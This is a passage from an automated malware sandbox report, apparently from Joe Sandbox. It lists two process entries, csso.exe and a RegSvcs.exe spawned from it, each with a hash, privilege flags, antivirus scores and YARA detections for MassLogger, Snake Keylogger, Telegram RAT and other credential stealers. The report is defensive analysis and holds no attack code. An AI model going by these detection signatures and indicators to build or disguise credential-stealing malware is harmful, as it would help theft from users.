                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:20:18:58
                                                                                    Start date:12/03/2025
                                                                                    Path:C:\Users\user\AppData\Roaming\csso.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\csso.exe"
                                                                                    Imagebase:0x20000
                                                                                    File size:962'048 bytes
                                                                                    MD5 hash:724A10F0D502447504BD44AD72AA462F
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 71%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:7
                                                                                    Start time:20:18:59
                                                                                    Start date:12/03/2025
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\csso.exe"
                                                                                    Imagebase:0x2b0000
                                                                                    File size:45'984 bytes
                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2527369873.0000000002766000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Disassembly

                                                                                    Reset < >